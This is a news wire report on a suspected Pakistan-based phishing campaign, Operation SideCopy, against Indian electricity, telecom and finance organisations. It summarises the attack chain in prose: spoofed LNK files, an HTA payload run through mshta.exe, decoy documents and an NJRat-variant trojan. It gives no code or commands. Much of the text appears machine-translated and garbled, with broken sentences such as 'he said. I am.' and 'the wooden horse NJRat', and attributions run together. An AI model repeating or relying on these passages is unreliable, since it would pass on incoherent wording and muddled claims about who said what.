New Delhi [India] July 11 (ANI): According to a major cybersecurity company, a suspected Pakistani group has launched a state-of-the-art phishing attack on India’s sensitive infrastructure such as electricity, telecommunications and finance.
Pentapostagma reported that a cybersecurity consultant at Quick Heal Technologies said a suspected group in Pakistan had launched a wave of advanced phishing attacks targeting key Indian infrastructure such as electricity and telecommunications. ..
According to security consultants, the first intrusion chain begins with spear phishing emails (emails designed to force users to install viruses, Trojan horses, or other malware).
Pentapostagma reports that emails are often pretended to be from government agencies, with fake documents such as IT returns attached, urging users to download and open them.
The company has discovered that hackers create fake websites that are commonly accessed by people working in the targeted organization.
“The content of the email tries to guide the user to extract the attached zip archive. When extracted, the user sees a document file that is actually an LNK file with a spoofed extension. This is usually considered a shortcut, “the company said.
“When a user opens a document, the LNK payload is launched and malicious activity is launched in the background. A decoy document is presented to the user to make sure the user is not suspicious,” he said. I am. LNK is a widely deployed Windows link format, typically used as a shortcut to launch a program or executable file.
“When the LNK file is launched, it downloads the HTA payload from the compromised domain and runs it via mshta.exe. This HTA file serves to display the decoy document to the user. In addition, LimShell The consultant also drops most of the backdoors used in this campaign to a remote access tool (RAT) or trojan that allows the program owner to control the end user’s computer. He said it was a variant of the wooden horse NJRat.
Cybersecurity consultants have discovered that the command and control server is from Pakistan.
“A thorough analysis of the attack chain, command and control (C2) server communications, and available telemetry data revealed that Seqrite (security consultant) researchers were compromised used to host attack scripts. You can identify the website. It acts as a C2 server.
“Further analysis of the data accessible from some C2 servers, Seqrite researchers came up with the IP addresses commonly found on various C2 servers. In fact, this IP address is the first in many logs. It turns out to be an entry for, and the corresponding system may have been used to test the attack before booting.
Further investigation of the IP revealed that the provider of the IP address was Pakistan Telecommunication Company Limited.
“This revelation further strengthens the claim that Operation SideCopy, operated by the Transparent Tribe Group, is occurring in Pakistan. The report further clarified the list of targets identified through C2 analyzed. Targets are telecommunications, electricity, and the financial sector.
“This may only be a subset of the target, as there are some other C2s used in OperationSideCopy APT, probably targeting other entities,” he said.
Seqrite warned government officials and is working with government officials to keep potential targets safe, Pentapostagma further reported. (ANI)